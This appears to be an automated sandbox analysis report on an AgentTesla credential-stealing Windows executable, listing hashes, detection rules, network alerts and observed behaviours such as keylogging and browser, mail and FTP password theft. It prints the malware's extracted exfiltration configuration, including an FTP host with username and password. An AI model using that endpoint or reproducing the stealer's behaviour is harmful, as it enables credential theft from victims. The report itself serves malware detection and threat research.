
Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Analysis ID:1460072
MD5:b3db9023fe215f9cc7ea9dc71387f111
SHA1:a46281d24cb8b7101a3307d10d81ac93a3e3abc4
SHA256:e67fccc9c4055f580dd361b3224a292ad2eb2b4f625b123a4f36872564c8c81b
Tags:exe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
Source: dump.pcap | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
  • 0x32f9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3300d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33097:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33129:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33193:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33205:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3329b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3332b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack | Rule: MALWARE_Win_AgentTeslaV2 | Description: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
  • 0x304d0:$s2: GetPrivateProfileString
  • 0x2fbf2:$s3: get_OSFullName
  • 0x31187:$s5: remove_Key
  • 0x31324:$s5: remove_Key
  • 0x3220e:$s6: FtpWebRequest
  • 0x32f7d:$s7: logins
  • 0x334ef:$s7: logins
  • 0x36200:$s7: logins
  • 0x362b2:$s7: logins
  • 0x37bba:$s7: logins
  • 0x36e56:$s9: 1.85 (Hash, version 2, native byte-order)
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
                    No Sigma rule has matched
                    Timestamp:06/20/24-14:23:09.712885
                    SID:2855542
                    Source Port:49709
                    Destination Port:43985
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/20/24-14:23:09.311887
                    SID:2029927
                    Source Port:49708
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/20/24-14:23:09.712885
                    SID:2851779
                    Source Port:49709
                    Destination Port:43985
                    Protocol:TCP
                    Classtype:A Network Trojan was detected


                    AV Detection

Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Avira: detected
Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Virustotal: Detection: 35%
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

Source: Traffic | Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49708 -> 108.179.234.136:21
Source: Traffic | Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49709 -> 108.179.234.136:43985
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49709 -> 108.179.234.136:43985
Source: global traffic | TCP traffic: 192.168.2.5:49709 -> 108.179.234.136:43985
Source: Joe Sandbox View | IP Address: 108.179.234.136
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: unknown | FTP traffic detected: 108.179.234.136:21 -> 192.168.2.5:49708 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 3 of 150 allowed. 220-Local time is now 07:23. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ftp.wapination.net
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.000000000330C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.wapination.net
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051097586.0000000003011000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.000000000330C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://wapination.net
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, SKTzxzsJw.cs | .Net Code: Fe9wfWKc5

                    System Summary

Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, Resource1.cs | Large array initialization: array initializer size 583319
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.5900000.5.raw.unpack, PingPong.cs | Large array initialization: array initializer size 12418
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_07F50660
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_0133E02C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_05580040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_05580006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_085C7850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_085C9DCF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_085C0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_085C4270
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_085C3280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_085CD2D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 0_2_085CD2C1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_01879BC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_01874A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_01873E48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_0187CE50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_01874190
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_067256E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_06720040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_06722EF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_06723F58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_0672DC20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_0672BD00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_06729AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_06728B80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_0672364B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Code function: 3_2_06725000
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2050545309.000000000139E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2062036493.0000000007ED0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051691772.0000000004247000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2061025024.0000000005900000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000000.2039660820.0000000000D10000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelWVk.exe. vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051097586.0000000003011000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051097586.0000000003011000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283328492.00000000012F9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Binary or memory string: OriginalFilenamelWVk.exe. vs SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 4JJG6X.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 4JJG6X.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, CqSP68Ir.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, CqSP68Ir.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.cs | Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.cs | Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, aZvWosTDY5WcGlwOCb.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.cs | Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.cs | Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, aZvWosTDY5WcGlwOCb.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.log
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Mutant created: NULL
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Virustotal: Detection: 35%
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: srvcli.dll
